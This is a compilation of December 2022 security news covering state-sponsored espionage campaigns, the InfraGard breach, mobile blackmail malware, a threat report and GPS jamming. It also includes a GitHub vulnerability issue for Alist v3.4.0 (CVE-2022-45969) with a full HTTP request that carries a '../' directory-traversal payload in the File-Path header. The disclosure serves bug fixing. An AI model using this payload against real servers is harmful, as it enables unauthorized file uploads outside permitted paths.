The MirrorFace group has deployed popular malware LodeInfo for spying and data theft against certain members of the Japanese House of Representatives.

The Chinese APT group MirrorFace attempted to influence the elections for the Japanese House of Representatives this year, an investigation has revealed.  

According to researchers at European IT security vendor ESET, the group used spear-phishing attacks on individual members of a political party. The research team, which calls the campaign Operation LiberalFace, found the fraudulent emails contained the well-known malware LodeInfo, a backdoor used to spread malware or steal credentials, documents, and emails from its victims.

MirrorFace is a Chinese-language threat actor that targets companies and organizations based in Japan. It launched the attack on June 29, 2022, before the Japanese elections in July.

Under the pretext of being the PR department of a Japanese political party, MirrorFace asked the recipients of the emails to share the attached videos on their own social media profiles. This was allegedly to further strengthen the party's perception and secure victory in the Chamber of Deputies.

The message also contains clear instructions on the publishing strategy for the videos and was supposedly sent in the name of a prominent politician.

**Malicious Attachments**

All spear-phishing messages contained a malicious attachment that, when executed, triggered the LodeInfo malware program on the compromised machine.

LodeInfo is a MirrorFace backdoor that is under continuous development. Its functions include taking screenshots, keylogging, terminating processes, exfiltrating data, executing additional malware, and encrypting certain files and folders.

The sophisticated and ever-evolving LodeInfo has earlier been deployed against media, diplomatic, government, public sector, and think-tank targets, according to researchers at Kaspersky, who have been tracking the malware family since 2019.

A previously undocumented credential stealer, named MirrorStealer by ESET Research, was also used in the attack. It's capable of stealing credentials from various applications such as browsers and email clients.

"During the Operation LiberalFace investigation, we managed to uncover further MirrorFace TTPs, such as the deployment and utilization of additional malware and tools to collect and exfiltrate valuable data from victims," wrote ESET researcher Dominik Breitenbacher. "Moreover, our investigation revealed that the MirrorFace operators are somewhat careless, leaving traces and making various mistakes."

There is speculation that this hacker group may be connected to APT10, but ESET could not find clear evidence of this or of cooperation with other APT groups in its analysis and is therefore pursuing MirrorFace as a separate entity.

The group reportedly primarily targets media, defense contractors, think tanks, diplomatic organizations, and academic institutions, with the goal of spying on and exfiltrating files of interest.

State-sponsored cyberattackers affiliated with China are actively building out a large network of attack infrastructure by compromising targets in the public and private spheres, according to a joint alert from the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), and the FBI.

The state-sponsored group RedAlpha APT, for example, has for years been targeting organizations working on behalf of the Uyghurs, Tibet, and Taiwan, looking to gather intel that could lead to human-rights abuses.

Chinese APT Group MirrorFace Interferes in Japanese Elections

In this episode of Talos Takes we are joined by Kendall McKay to discuss the recently released year in review report and dig deep on our activities in Ukraine. The year in review covers a vast amount of data and intel sources to identify some of the key trends we observed in 2022.

Friday, December 16, 2022 09:12

In this episode of Talos Takes we are joined by Kendall McKay to discuss the recently released year in review report and dig deep on our activities in Ukraine. The year in review covers a vast amount of data and intel sources to identify some of the key trends we observed in 2022. Our activities in Ukraine have been well documented, in this episode we'll also talk more broadly about the trends and highlight some key findings from the past year.

This and all other episdoes are available on the Talos Takes podcast page and most major podcasting outlets.

Visit the Year in Review page for the full report, with topic summary reports, livestreams, podcasts, and other content starting December 14th.  New content will be added with each topic summary release through February.  You can access the full 2022 Cisco Talos Year in Review report directly here:

Talos Takes Ep. 122: Year in Review & Ukraine Activities

Government entities in Ukraine have been breached as part of a new campaign that leveraged trojanized versions of Windows 10 installer files to conduct post-exploitation activities.
Mandiant, which discovered the supply chain attack around mid-July 2022, said the malicious ISO files were distributed via Ukrainian- and Russian-language Torrent websites. It's tracking the threat cluster as UNC4166

Government entities in Ukraine have been breached as part of a new campaign that leveraged trojanized versions of Windows 10 installer files to conduct post-exploitation activities.

Mandiant, which discovered the supply chain attack around mid-July 2022, said the malicious ISO files were distributed via Ukrainian- and Russian-language Torrent websites. It's tracking the threat cluster as **UNC4166**.

"Upon installation of the compromised software, the malware gathers information on the compromised system and exfiltrates it," the cybersecurity company said in a technical deep dive published Thursday.

Although the adversarial collective's provenance is unknown, the intrusions are said to have targeted organizations that were previously victims of disruptive wiper attacks attributed to APT28, a Russian state-sponsored actor.

The ISO file, per the Google-owned threat intelligence firm, was designed to disable the transmission of telemetry data from the infected computer to Microsoft, install PowerShell backdoors, as well as block automatic updates and license verification.

The primary goal of the operation appears to have been information gathering, with additional implants deployed to the machines, but only after conducting an initial reconnaissance of the compromised environment to determine if it contains the intelligence of value.

These included Stowaway, an open source proxy tool, Cobalt Strike Beacon, and SPAREPART, a lightweight backdoor programmed in C, enabling the threat actor to execute commands, harvest data, capture keystrokes and screenshots, and export the information to a remote server.

In some instances, the adversary attempted to download the TOR anonymity browser onto the victim's device. While the exact reason for this action is not clear, it's suspected that it may have served as an alternative exfiltration route.

SPAREPART, as the name implies, is assessed to be a redundant malware deployed to maintain remote access to the system should the other methods fail. It's also functionally identical to the PowerShell backdoors dropped early on in the attack chain.

"The use of trojanized ISOs is novel in espionage operations and included anti-detection capabilities indicates that the actors behind this activity are security conscious and patient, as the operation would have required a significant time and resources to develop and wait for the ISO to be installed on a network of interest," Mandiant said.

**Cloud Atlas Strikes Russia and Belarus**

The findings come as Check Point and Positive Technologies disclosed attacks staged by an espionage group dubbed **Cloud Atlas** against the government sector in Russia, Belarus, Azerbaijan, Turkey, and Slovenia as part of a persistent campaign.

The hacking crew, active since 2014, has a track record of attacking entities in Eastern Europe and Central Asia. But since the outbreak of the Russo-Ukrainian war, it has been observed primarily targeting entities in Russia, Belarus, and Transnistria.

"The actors are also maintaining their focus on the Russian-annexed Crimean Peninsula, Lugansk, and Donetsk regions," Check Point said in an analysis last week.

Cloud Atlas, also called Clean Ursa, Inception, and Oxygen, remains unattributed to date, joining the likes of other APTs like TajMahal, DarkUniverse, and Metador. The group gets its name for its reliance on cloud services like OpenDrive to host malware and for command-and-control (C2).

Attack chains orchestrated by the adversary typically make use of phishing emails containing lure attachments as the initial intrusion vector, which ultimately lead to the delivery of a malicious payload via an intricate multi-stage sequence.

The malware then proceeds to initiate contact with an actor-controlled C2 server to retrieve additional backdoors capable of stealing files with specific extensions from the breached endpoints.

Attacks observed by Check Point, on the other hand, culminate in a PowerShell-based backdoor called PowerShower, which was first documented by Palo Alto Networks Unit 42 in November 2018.

Some of these intrusions in June 2022 also turned out to be successful, permitting the threat actor to gain full access to the network and use tools like Chocolatey, AnyDesk, and PuTTY to deepen their foothold.

"With the escalation of the conflict between Russia and Ukraine, their focus for the past year has been on Russia and Belarus and their diplomatic, government, energy and technology sectors, and on the annexed regions of Ukraine," Check Point added.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Trojanized Windows 10 Installer Used in Cyberattacks Against Ukrainian Government Entities

Alist v3.4.0 is vulnerable to Directory Traversal,

**Please make sure of the following things**

*   I have read the documentation.
*   I'm sure there are no duplicate issues or discussions.
*   I'm sure it's due to alist and not something else(such as Dependencies or Operational).
*   I'm sure I'm using the latest version

**Alist Version / Alist 版本**

v3.4.0（It seems like this problem still exists in version 3.5.1）

**Driver used / 使用的存储驱动**

Local

**Describe the bug / 问题描述**

*   A user with only file upload permission can bypass the base path restriction by using '... /' to bypass the base path restriction and upload files to an arbitrary path
    
*   I created a user 'test' with file upload permission only and set its base path to '/test'
    

*   My file directory structure is as follows

*   Login as 'test', found out that I am already in '/test'

*   And try to upload a file, catch the package and modified the 'File-path' parameter with '../'

*   Send the package, and login as 'admin' to check out the '/testPasswd'. Will find out that the file has been uploaded successfully.

**Reproduction / 复现链接**

Package:  
PUT /api/fs/put HTTP/1.1  
Host: 192.168.31.148:52000  
Content-Length: 30530  
Accept: application/json, text/plain, _/_  
As-Task: false  
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QiLCJleHAiOjE2NjkyOTQ4NTMsIm5iZiI6MTY2OTEyMjA1MywiaWF0IjoxNjY5MTIyMDUzfQ.DwnVRyCGUZ0Cx2B7s6kCqvrg\_-rzQ7hf5tbbsy4RSVc  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36  
**File-Path: ..%2ftestPasswd%2ftestDirectoryTraversal**  
Content-Type: application/octet-stream  
Origin: http://192.168.31.148:52000  
Referer: http://192.168.31.148:52000/  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Connection: close

�PNG  
�

**Logs / 日志**

CVE-2022-45969: Directory traversal file upload vulnerability · Issue #2449 · alist-org/alist

InfraGard's members include key security decision-makers and stakeholders from all 16 US civilian critical-infrastructure sectors.

A hacker using the handle "USDoD" has reportedly stolen contact information on more than 80,000 members of an FBI-run program called InfraGard and put the information up for sale on an English-speaking Dark Web forum.

The information the hacker accessed from InfraGard's database appears to be fairly basic and in some cases does not even include an email address, according to KrebsOnSecurity, which first reported on the incident this week. But the information belongs to CISOs, security directors, IT and C-suite executives, healthcare professionals, emergency managers, and law enforcement and military personnel directly responsible for protecting US critical infrastructure.

**A Potentially Valuable Asset**

As such, the stolen data represents a valuable asset for adversaries, says former InfraGard member Chris Pierson, currently CEO of BlackCloak, an online privacy-protection service for top executives and corporate leaders.

"The InfraGard database of contacts is a big win for any intelligence agency or nation-state to possess," Pierson says. The compromised data is nowhere close in sensitivity compared to major breaches such as the one that the US Office of Personnel Management (OPM) disclosed in 2015. Still, it is very practical and easy to use from an attacker's perspective, he says.

"While much of the information may be public or publicly available, the condensing of this information into the key people who run our nation's critical infrastructure is immensely valuable," Pierson notes. Personal addresses, personal cell phones, and easy access to which members possess a security clearance are all key pieces of data for an adversary to have, he says.

The FBI describes InfraGard as an initiative to bolster the nation's collective ability to defend against physical and cyber threats to critical infrastructure targets. It basically connects the FBI directly with critical infrastructure owners, operators, and security stakeholders. Its members include key security personnel and decision-makers from all 16 US civilian critical infrastructure sectors.

According to KrebsOnSecurity, the hacker "USDoD" gained access to the InfraGard database by first applying for a new account using the name, date of birth, and Social Security number of a chief executive officer at a large financial services company. The hacker apparently applied for InfraGard membership in November and provided an attacker-controlled email address and the actual phone number of the CEO, as contact information.

**An Opsec Lapse?**

Though InfraGard was supposed to have vetted that information, they never did and instead approved the application based on the information that the hacker had provided, KrebsOnSecurity reported. Similarly, though accessing InfraGard's portal requires two-factor authentication, the hacker found he could use the email address as a second factor instead — thereby obviating the need for access to the real CEO's phone.

Once on the portal, the attacker discovered that InfraGard user information could be relatively easily accessed via an API built into several components on the website, KrebsOnSecurity said, citing a direct conversation with the attacker. The hacker then apparently got a friend to code a Python query for retrieving all available InfaGard member information via the API. KrebsOnSecurity quoted the attacker as setting an asking price of $50,000 for the stolen dataset, but not really expecting any buyers at that price because of the basic nature of the information.

InfraGard member Will Carson, director of IT and cybersecurity at Cybrary, expressed frustration over the incident. “As an InfraGard member, it certainly isn't great to hear your information may have been disclosed from a news outlet before you hear from the impacted organization," he said in a statement responding to the news. He expressed disappointment over being unable to log into his InfraGard account after the apparent breach.

"Although I have full faith InfraGard leadership has a stronger grasp of the facts than I do from the outside, the radio silence to date makes me uneasy as a potentially impacted professional," he says.

The FBI did not immediately respond to a Dark Reading request for comment submitted via email to its press office.

Stolen Data on 80K+ Members of FBI-Run InfraGard Reportedly for Sale on Dark Web Forum

By Owais Sultan
2022 has been a tumultuous one for cybersecurity professionals. Breaches, hacks, and ransomware attacks have become commonplace in…
This is a post from HackRead.com Read the original post: The State of Cybersecurity: Why Industry Experts Are Optimistic

2022 has been a tumultuous one for cybersecurity professionals. Breaches, hacks, and ransomware attacks have become commonplace in the news cycle, leaving many feeling vulnerable and uncertain about their digital safety. 

But despite the headlines, there is good news on the horizon. According to industry experts, the state of cybersecurity is actually looking brighter than ever before. Let’s take a look at what is driving this growing optimism and what it could mean for the future of cybersecurity. 

**The Increasing Adoption of Security Best Practices **

One major factor that is driving optimism in the cybersecurity field is the increasing adoption of security best practices by businesses and organizations around the world. As more companies become aware of the importance of protecting their data, they are taking steps to ensure that their systems are secure. 

This includes investing in security tools such as firewalls, antivirus software, and encryption solutions to protect against cyber threats. Additionally, many organizations have implemented policies and procedures to ensure that their staff members adhere to security protocols when handling sensitive information. All these measures help reduce the risk posed by cybercriminals and make businesses less attractive targets for attackers. 

**Improved Security Awareness Among Consumers **

Another key factor that has contributed to increased optimism about cybersecurity is improved security awareness among consumers. Thanks to increased public education campaigns from governments and tech companies, consumers now have a better understanding of how to protect themselves from online threats. 

For example, most people now know not to click on suspicious links or open emails from unknown senders in order to avoid falling victim to phishing scams or malware infections. This increased level of security awareness helps reduce the number of potential victims for cybercriminals and makes it harder for them to launch successful attacks against unsuspecting users. 

**The Growing Role of Artificial Intelligence in Cybersecurity **

Finally, another reason why many industry experts are feeling more optimistic about cybersecurity is due to the growing role artificial intelligence (AI) is playing in helping detect and prevent cybercrime. AI-based systems can analyze vast amounts of data quickly and accurately in order to identify patterns that may indicate malicious activity on a network or website. 

This allows organizations to be proactive rather than reactive when it comes to preventing cyberattacks, which significantly reduces their risk exposure. Additionally, AI can detect sophisticated attacks earlier than traditional security solutions, which gives IT teams time to act before any harm is done.  

**The Role of Cybersecurity SEO Agency **

According to cybersecurity SEO agency AWISEE, they have seen a heightened demand for their services in recent years. Investing more in growth is an opportunity that can help companies protect their digital infrastructure from staying competitive. 

In today’s market. By taking the time to analyze both internal and external business processes, Cybersecurity SEO Agencies are able to provide sound advice to reduce the risk for those looking for cybersecurity services. With industry applications growing more complex and cyber threats increasing, SEO Agencies provide a valuable solution that companies cannot afford to ignore.

**Conclusion**

Overall, there are several reasons why industry experts are feeling more optimistic about cybersecurity these days – from increased adoption of security best practices by businesses, improved security awareness among consumers, and the growing role AI plays in detecting potential threats – all these factors have contributed towards a brighter outlook for the future of cybersecurity worldwide. 

That said, it’s important for businesses and individuals alike to remain vigilant when it comes to staying safe online so they can continue reaping the benefits of this positive trend going forward into 2023 and beyond!

**More Cybersecurity Topics**

1.  The Human Factor in Cybersecurity
2.  Brand Protection is Essential for Cybersecurity
3.  How to use AI (Artificial Intelligence) in cybersecurity?
4.  CISA Publishes List of Free Cybersecurity Tools and Services
5.  Cybersecurity Has Never Been More Unstable Than It Is Now

Owais takes care of Hackread's social media from the very first day. At the same time He is pursuing for chartered accountancy and doing part time freelance writing.

The State of Cybersecurity: Why Industry Experts Are Optimistic

New research also analyzes the commoditization of adversary-in-the-middle attacks, JavaScript obfuscation in exploit kits, and a malware family with Gothic Panda ties.

**SEATTLE – December 15, 2022** **–** WatchGuard® Technologies, a global leader in unified cybersecurity, today released its latest quarterly Internet Security Report, detailing the top malware trends, and network and endpoint security threats analyzed by WatchGuard Threat Lab researchers in Q3 2022. Key findings from the data reveal the quarter’s top malware threat was detected exclusively over encrypted connections, ICS attacks are maintaining popularity, LemonDuck malware is evolving beyond cryptominer delivery, a Minecraft cheat engine is delivering a malicious payload, and much more.“We can’t emphasize enough how important it is for HTTPS inspection to be enabled, even if it requires some tuning and exceptions to do properly. The majority of malware arrives over encrypted HTTPS, and not inspecting it means you’re missing those threats,” said Corey Nachreiner, chief security officer at WatchGuard Technologies. “Rightfully so, the big prizes for attackers like an Exchange server or a SCADA management system deserve extraordinary attention as well this quarter. When a patch is available, it’s important to update immediately, as attackers will eventually benefit from any organization that has yet to implement the latest patch.” 

Other key findings from the Q3 Internet Security Report include:

*   The vast majority of malware arriving over encrypted connections – Although Agent.IIQ placed third in the normal top 10 malware list this quarter, it landed in the #1 spot at the top of the encrypted malware list for Q3. In fact, if you look at the detections for it on both of these lists, you’ll see all Agent.IIQ detections come from encrypted connections. In Q3, if a Firebox was inspecting encrypted traffic, 82% of the malware it detected was through that encrypted connection, leaving only a meager 18% detected without encryption. If you’re not inspecting encrypted traffic on your Firebox, it’s very likely that this average ratio remains true, and you are missing a huge portion of malware. Hopefully, you at least have endpoint protection implemented for a chance to catch it further down the cyber kill chain.

*   ICS and SCADA systems remain trending attack targets – New to the top 10 network attacks list this quarter is a SQL injection-type attack that affected several vendors. One of these companies is Advantech, whose WebAccess portal is used for SCADA systems across a variety of critical infrastructure. Another serious exploit in Q3, which also appeared in the top five network attacks by volume, involved Schneider Electric's U.motion Builder software versions 1.2.1 and prior. This is a stark reminder that attackers aren’t quietly waiting for an opportunity – rather, they are actively seeking system compromise wherever possible.
*   Exchange server vulnerabilities continuing to pose risk – The most recent CVE among the Threat Lab’s new signatures this quarter, CVE-2021-26855, is a Microsoft Exchange Server Remote Code Execution (RCE) vulnerability for on-premises servers. This RCE vulnerability was given a 9.8 CVE score and is known to have been exploited. The date and severity of CVE-2021-26855 should also ring a bell, as it is one of the exploits used by the group HAFNIUM. While most Exchange servers affected by it have likely been patched by now, _most_ does not equate to _all_. Therefore, risks remain.

*   Threat actors targeting seekers of free software – Fugrafa downloads malware that injects malicious code. This quarter, the Threat Lab examined a sample of it that was found in a cheat engine for the popular game Minecraft. While the file shared primarily on Discord claims to be the Minecraft cheat engine Vape V4 Beta, that’s not all it contains. Agent.FZUW has some similarities to Variant.Fugrafa, but instead of installation through a cheat engine, the file itself pretends to have cracked software. The Threat Lab discovered this particular sample has connections with Racoon Stealer, a cryptocurrency hacking campaign used to hijack account information from cryptocurrency exchange services.

*   LemonDuck malware evolving beyond cryptominer delivery – Even with a dip in total blocked or tracked malware domains for the third quarter of 2022, it is easy to see that attacks on unsuspecting users are still high. With three new additions to the top malware domains list – two of which were former LemonDuck malware domains, and the other part of an Emotet classified domain – Q3 saw more malware and attempted malware sites that were newer domains than usual. This trend will change and modify with the landscape of cryptocurrency in turmoil as attackers look for other venues to trick users. Keeping DNS protection enabled is a way to monitor and block unsuspecting users from allowing malware or other serious issues into your organization.

*   JavaScript obfuscation in exploit kits – Signature 1132518, a generic vulnerability for detecting JavaScript Obfuscation attacks against browsers, was the only new addition to the most-widespread network attack signatures list this quarter. JavaScript is a common vector for attacking users and threat actors use JavaScript-based exploit kits all the time – in malvertising, watering hole and phishing attacks, just to name a few. As the defensive fortifications have improved on browsers, so have attackers’ ability to obfuscate malicious JavaScript code.

*   Anatomy of commoditized adversary-in-the-middle attacks – While multi-factor authentication (MFA) is undeniably the single best technology you can deploy to protect against the bulk of authentication attacks, it is not on its own a silver bullet against all attack vectors. Cyber adversaries have made this clear with the rapid rise and commoditization of adversary-in-the-middle (AitM) attacks, and the Threat Lab’s deep dive on EvilProxy, the top security incident of Q3, shows just how malicious actors are beginning to pivot to more sophisticated AitM techniques. Like the Ransomware as a Service offering made popular in recent years, the September 2022 release of an AitM toolkit called EvilProxy has significantly lowered the barrier of entry for what was previously a sophisticated attack technique. From a defensive standpoint, successfully combatting this kind of AitM attack technique requires a mix of both technical tools and user awareness.
*   A malware family with Gothic Panda ties – The Threat Lab’s Q2 2022 report described how Gothic Panda—a state-sponsored threat actor connected to China’s Ministry of State Security—was known to use one of the top malware detections from that quarter. Interestingly, the top encrypted malware list for Q3 includes a malware family called Taidoor, which was not only created by Gothic Panda but has only been seen used by Chinese government cyber actors. While this malware typically focuses on targets in Japan and Taiwan in general, the Generic.Taidoor sample analyzed this quarter was found primarily targeting organizations in France, suggesting that some Fireboxes in this region may have detected and blocked parts of a state-sponsored cyberattack.
*   New ransomware and extortion groups in the wild –Additionally this quarter, the Threat Lab is excited to announce a new, concerted effort to track current ransomware extortion groups and build out its threat intelligence capabilities to provide more ransomware-related information in future reports. LockBit tops the list for Q3 with over 200 public extortions on their dark web page – nearly four times more than that of Basta, the second most prolific ransomware group WatchGuard observed this quarter.WatchGuard’s quarterly research reports are based on anonymized Firebox Feed data from active WatchGuard Fireboxes whose owners have opted to share data in direct support of the Threat Lab’s research efforts. In Q3, WatchGuard blocked a total of more than 17.3 million malware variants (211 per device) and more than 2.3 million network threats (28 per device). The full report includes details on additional malware and network trends from Q3 2022, recommended security strategies, critical defense tips for businesses of all sizes and in any sector, and more.
    
    For a detailed view of WatchGuard’s research, read the complete Q3 2022 Internet Security Report here.
    
    About WatchGuard Technologies, Inc.
    
    WatchGuard® Technologies, Inc. is a global leader in unified cybersecurity. Our Unified Security Platform® approach is uniquely designed for managed service providers to deliver world-class security that increases their business scale and velocity while also improving operational efficiency. Trusted by more than 17,000 security resellers and service providers to protect more than 250,000 customers, the company’s award-winning products and services span network security and intelligence, advanced endpoint protection, multi-factor authentication, and secure Wi-Fi. Together, they offer five critical elements of a security platform: comprehensive security, shared knowledge, clarity & control, operational alignment, and automation. The company is headquartered in Seattle, Washington, with offices throughout North America, Europe, Asia Pacific, and Latin America. To learn more, visit WatchGuard.com.
    

For additional information, promotions and updates, follow WatchGuard on Twitter (@WatchGuard), on Facebook, or on the LinkedIn Company page. Also, visit our InfoSec blog, Secplicity, for real-time information about the latest threats and how to cope with them at www.secplicity.org. 

Subscribe to The 443 – Security Simplified podcast at Secplicity.org, or wherever you find your favorite podcasts.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

WatchGuard Threat Lab Report Finds Top Threat Arriving Exclusively Over Encrypted Connections

Money-lending apps built using the Flutter software development kit hide a predatory spyware threat and highlight a growing trend of using personal data for blackmail.

An Android malware campaign dubbed MoneyMonger has been found hidden in money-lending apps developed using Flutter. It's emblematic of a rising tide of blackmailing cybercriminals targeting consumers — and their employers stand to feel the effects, too.

According to research from the Zimperium zLabs team, the malware uses multiple layers of social engineering to take advantage of its victims and allows malicious actors to steal private information from personal devices, then use that information to blackmail individuals.

The MoneyMonger malware, distributed through third-party app stores and sideloaded onto victims' Android devices, was built from the ground up to be malicious, targeting those in need of quick cash, according to Zimperium researchers. It uses multiple layers of social engineering to take advantage of its victims, beginning with a predatory loan scheme and promising quick money to those who follow a few simple instructions.

In the process of setting up the app, the victim is told that permissions are needed on the mobile endpoint to ensure they are in good standing to receive a loan. These permissions are then used to collect and exfiltrate data, including from the contact list, GPS location data, a list of installed apps, sound recordings, call logs, SMS lists, and storage and file lists. It also gains camera access.

This stolen information is used to blackmail and threaten victims into paying excessively high-interest rates. If the victim fails to pay on time, and in some cases even after the loan is repaid, the malicious actors threaten to reveal information, call people from the contact list, and even send photos from the device.

One of the new and interesting things about this malware is how it uses the Flutter software development kit to hide malicious code.

While the open source user interface (UI) software kit Flutter has been a game changer for application developers, malicious actors have also taken advantage of its capabilities and framework, deploying apps with critical security and privacy risks to unsuspecting victims.

In this case, MoneyMonger takes advantage of Flutter’s framework to obfuscate malicious features and complicate the detection of malicious activity by static analysis, Zimperium researchers explained in a Dec. 15 blog post.

**Risk to Enterprises Stems from Wide Range of Data Collected**

Richard Melick, director of mobile threat intelligence at Zimperium, tells Dark Reading that consumers using money lending apps are most at risk, but by the nature of this threat and how attackers steal sensitive information for blackmail, they are also putting their employers or any organization they work with at risk, too.

"It’s very easy for the attackers behind MoneyMonger to steal information from corporate email, downloaded files, personal emails, phone numbers, or other enterprise apps on the phone, using it to extort their victims," he says.

Melick says MoneyMonger is a risk to individuals and enterprises because it collects a wide range of data from the victim’s device, including potentially sensitive enterprise-related material and proprietary information.

"Any device connected to enterprise data poses a risk to the enterprise if an employee falls victim to the MoneyMonger predatory loan scam on that device," he says. "Victims of this predatory loan might be compelled to steal to pay the blackmail or not report the theft of critical enterprise data by the malicious actors behind the campaign."

Melick says that personal mobile devices represent a significant, unaddressed attack surface for enterprises. He points out that malware against mobile only continues to get more advanced, and without the threat telemetry and critical defense in place to stand up against this growing subset of malicious activity, enterprises and their employees are left at risk.

"No matter if they are corporate-owned or part of a BYOD strategy, the need for security is critical to stay ahead of MoneyMonger and other advanced threats," he says. "Education is only part of the key here and technology can fill in the gaps, minimizing the risk and attack surface presented by MoneyMonger and other threats."

It's also important to remember to avoid downloading apps from unofficial app stores; official stores, like Google Play, do have protections for users, a Google spokesperson emphasized to Dark Reading.

"None of the identified malicious apps in the report are on Google Play," he said. "Google Play Protect checks Android devices with Google Play Services for potentially harmful apps from other sources. Google Play Protect will warn users that attempt to install or launch apps that have been identified to be malicious."

**Resurgence of Banking Trojans**

The MoneyMonger malware follows the resurgence of the Android banking Trojan SOVA, which now sports updated capabilities and an additional version in development that contains a ransomware module.

Other banking Trojans have resurfaced with updated features to help skate past security, including Emotet, which re-emerged earlier this summer in a more advanced form after having been taken down by a joint international task force in January 2021.

Nokia's 2021 "Threat Intelligence Report" warned that banking malware threats are sharply increasing, as cybercriminals target the rising popularity of mobile banking on smartphones, with plots aimed at stealing personal banking credentials and credit card information.

**Blackmailing Threats Expected to Continue in 2023**

Melick points out blackmail is not new to malicious actors, as has been seen in ransomware attacks and data breaches on a global scale.

"The use of blackmail on such a personal level, targeting individual victims, though, is a bit of a novel approach that takes an investment of personnel and time," he says. "But it is paying off and based on the number of reviews and complaints around MoneyMonger and other predatory loan scams similar to this, it is only going to continue."

He predicts market and financial conditions will leave some people desperate for ways to pay bills or get extra cash.

"Just as we saw predatory loan scams rise up in the last recession," he says, "it is almost guaranteed we will see this model of theft and blackmail continue into 2023."

Blackmailing MoneyMonger Malware Hides in Flutter Mobile Apps

Navigation system monitors have seen a recent uptick in interruptions since Ukraine began launching long-range drone attacks.

Every day, billions of people use the GPS satellite system to find their way around the world—but GPS signals are vulnerable. Jamming and spoofing attacks can cripple GPS connections entirely or make something appear in the wrong location, causing disruption and safety issues. Just ask Russia.

New data analysis reveals that multiple major Russian cities appear to have faced widespread GPS disruption during the past week. The signal interference follows Ukraine launching long-range drone attacks deep into Russian territory, and it may act as a way to potentially stop drones that rely upon GPS for navigation, experts say. 

The GPS interference has “expanded on a scale that hasn't been seen before,” says Erik Kannike, a program manager at Estonian defense intelligence firm SensusQ who has been monitoring the situation. “What we're seeing now, since about a week ago, is GPS jamming bubbles covering hundreds if not thousands of kilometers around tactical cities.”

The GPS issues were first spotted by the monitoring system GPSJam, which uses data from planes to track problems with the satellite navigation system. The website has logged an increasing number of GPS disturbances in the Russian cities of Saratov, Volgograd, and Penza since the start of December. All of the cities are in Eastern Russia and within hundreds of kilometers of the border with Ukraine. 

On December 5, GPSJam logged a limited amount of GPS interference in Russia—the majority of registered interference took place around Moscow, where the Kremlin for years has tampered with GPS connections. However, since December 11, multiple areas of the country have faced GPS disruption, data gathered by GPSJam shows. In addition, wireless data analytics firm Aurora Insight measured an increase in GPS signal levels in the area at the start of December—a sign that potential GPS interference could have happened.

At the start of Russia’s full-scale invasion of Ukraine in February, there was no GPS interference detected by the website in these areas—aside from around Moscow. In recent months, the website has tracked little signal interference around Russia, although there has been some near Belarus. Some GPS disturbances have also been logged near Russia's border with Finland.

Disruption to Global Navigation Satellite Systems—a broad term that includes all satellite-based navigation systems, including Russia’ GLONASS, China's Beidou, and Europe's Galileo—can be caused in multiple ways. Most commonly, attackers use jamming or spoofing. Jamming can involve overriding radio signals so they don’t operate as intended, while spoofing can create false signals. Jamming can stop drones flying in certain areas and make map apps unreliable. And hundreds of warships appear to have had their locations spoofed since 2020.

As the most widely used GNSS system, GPS has become an “international utility” in recent decades. This also means it has become “more susceptible and more likely to be interrupted,” says Dana Goward, the president of the Resilient Navigation and Timing Foundation, a nonprofit that helps to protect critical infrastructure. “Doing so causes greater and greater havoc in any number of systems,” Goward adds.

There are relatively few large-scale monitoring efforts tracking GPS disruptions. John Wiseman, the technologist and open source enthusiast who created GPSJam, says the system works by looking at ADS-B signals that are sent by planes flying around the world—the signals are used by planes to let people know their location and to allow them to be tracked. As part of ADS-B data, a plane’s GNSS signal strength can be recorded.

Wiseman says GPSJam, which launched in July after he began collecting data in mid-February, uses ADS-B data from ADS-B Exchange, a network of aviation followers who track planes. This is generally GPS data, but it can also be other GNSS data if a plane uses a different system. Wiseman then aggregates this data each day to show areas where there appears to be GPS interference. 

The GPSJam map shows potential interference in red hexes across a world map, while areas where there may be some smaller interference are shown in yellow, and green hexes represent no interference. The system is able to classify areas only where planes have flown over and where ADS-B data is collected. Since the start of the war in Ukraine, planes have not been flying over the country’s airspace.

“Most of the red zones that are regularly there correlate with places where people have previously documented GPS interference,” Wiseman says. (He has previously built multiple open source flight tracking tools.) “It's really just measuring aircraft. There are stories where people on the ground and some of those regions aren't noticing anything.” In the cities recently impacted, there have been some Russian-language social media posts discussing outages, although it is unclear how widely GPS has been disrupted on the ground.

Todd Walter, the director of the GNSS laboratory at Stanford University, says GPSJam is a “valuable resource” for those tracking GPS interference. “It is a good method to quickly see where jamming is prevalent,” Walter says. Along with fellow researchers at Stanford, Walter has previously documented how ADS-B data can be used for tracking GNSS disruptions. Despite the technique working, Walter says, there are limitations to using ADS-B data to track GPS outages. 

“It is not very good at detecting weak jammers or jammers on other frequencies,” Walter explains, adding that an aircraft’s body can shield potential sources of blocking, making it harder to detect smaller, local sources of GPS blocking. “Areas that are green on GPSJam are not necessarily free of any GPS jamming,” he adds.

GPS disruptions can also be monitored from space. Data provided to WIRED from Aurora Insight, which uses satellites to sense GNSS disruptions, shows an increase in signal strength in eastern Russia in recent weeks, compared with measurements taken in August. “Increases in GPS signal levels have the potential to interfere with some types of GPS receivers,” the company says, pointing out that this does not explicitly mean interference or jamming has taken place. 

Throughout Russia's full-scale war in Ukraine, its forces have attempted to control the information space and communications. Its hack against the ViaSat satellite system disrupted satellite connections across Europe. Cities have had telephone equipment destroyed by missiles, and in some occupied areas Russia has tried to take control of Ukraine’s internet, subjecting people to censorship and surveillance. (At the same time, Russia has been hacked at an unprecedented scale.) 

Electronic warfare—including the jamming and blocking of GPS signals—has also been a part of the war. Russia has a well-documented history of disrupting GNSS signals, including testing electronic warfare systems in Syria. In 2018, taxis around the Kremlin appeared thousands of miles away on maps. Tankers off the Russian coast have also vanished from tracking systems. One 2019 report from the nonprofit C4ADS documented 9,883 cases of GNSS spoofing linked to Russia, saying it often happens when president Vladimir Putin visits an area. (Russia is not the only country with these capabilities: In the past eight years, commercial airlines in the US have reported at least 90 incidents of GPS interference, many of which were reportedly linked to nearby military tests.)

